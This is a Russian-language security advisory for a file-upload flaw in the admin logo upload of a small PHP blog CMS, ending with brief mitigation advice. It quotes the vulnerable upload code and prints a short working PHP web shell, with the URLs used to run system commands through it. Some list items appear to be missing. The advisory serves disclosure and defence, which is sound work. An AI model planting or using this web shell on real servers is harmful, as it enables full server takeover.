
CVE-2025-15495 - Произвольная загрузка файлов, приводящая к удаленному выполнению кода (RCE)
BiggiDroid – Simple PHP Blog CMS Страница продукта: https://biggidroid.com/product/simple-php-blog/
Критическая
CVSS (Оценка): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Система Simple PHP Blog CMS содержит уязвимость неограниченной загрузки файлов в функциональности загрузки логотипа сайта панели администратора. Аутентифицированный злоумышленник может загрузить вредоносный PHP-файл, замаскированный под изображение, который сохраняется в доступном через веб директорию и выполняется сервером, что приводит к удаленному выполнению команд.
Панель администратора → Обновить логотип сайта
Соответствующий фрагмент уязвимого кода:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
Создайте файл с именем shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php в качестве файла логотипа📌 Приложение принимает PHP-файл без проверки
После загрузки файл доступен по адресу:
http://127.0.0.1/image/shell.php
Выполнение системных команд:
http://127.0.0.1/image/shell.php?cmd=dir
Сервер выполняет команды ОС и возвращает вывод, подтверждая удаленное выполнение кода.





Злоумышленник может:
Эта уязвимость может привести к полному захвату сервера.
.htaccess / усиление безопасности сервераОграничить расширения файлов
$allowed = ['jpg','jpeg','png','gif'];
Проверять MIME-тип
finfo_file()
Переименовывать загруженные файлы